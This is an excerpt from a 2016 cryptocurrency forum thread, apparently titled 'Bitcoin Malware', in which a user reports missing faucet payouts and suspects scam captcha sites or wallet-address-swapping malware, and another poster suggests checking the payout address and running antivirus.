I have been similar situation. some chaptcha sites writ that they found dublicate IP or they wrote they add me as scamr. and why? they block my IP. I talk about sites which pays 1000 or more.. sometimes, they wrote that 1000 satoshi sent your account, after that I chack my account and there not any satoshis. it seems, there are scammers as a captcha sites or there are scammer who changes the wallet address. who was in this situation?
you will get after claiming in faucet to check the address where it sended the bitcoin and you can check is that the same address of yours you have copied earlier or not. If it is changing that its better you install good antivirus and search for malware.

Title: Re: Bitcoin Malware
Post by: Juventino02 on May 24, 2016, 06:27:11 PM
I have been similar situation. some chaptcha sites writ that they found dublicate IP or they wrote they add me as scamr. and why? they block my IP. I talk about sites which pays 1000 or more.. sometimes, they wrote that 1000 satoshi sent your account, after that I chack my account and there not any satoshis. it seems, there are scammers as a captcha sites or there are scammer who changes the wallet address. who was in this situation?
you will get after claiming in faucet to check the address where it sended the bitcoin and you can check is that the same address of yours you have copied earlier or not. If it is changing that its better you install good antivirus and search for malware.

I have used to copy and paste my wallet address every time.. But there are this problem. I have so strong antivirus, total viewer 360 , it write me which sites or files are dangerous. it newer install virus programs.. I think, in captcha sites are scammers.. can you tell me how increase my satoshis. I want to start without spending money. if you have reliable captcha sites send me reffelers links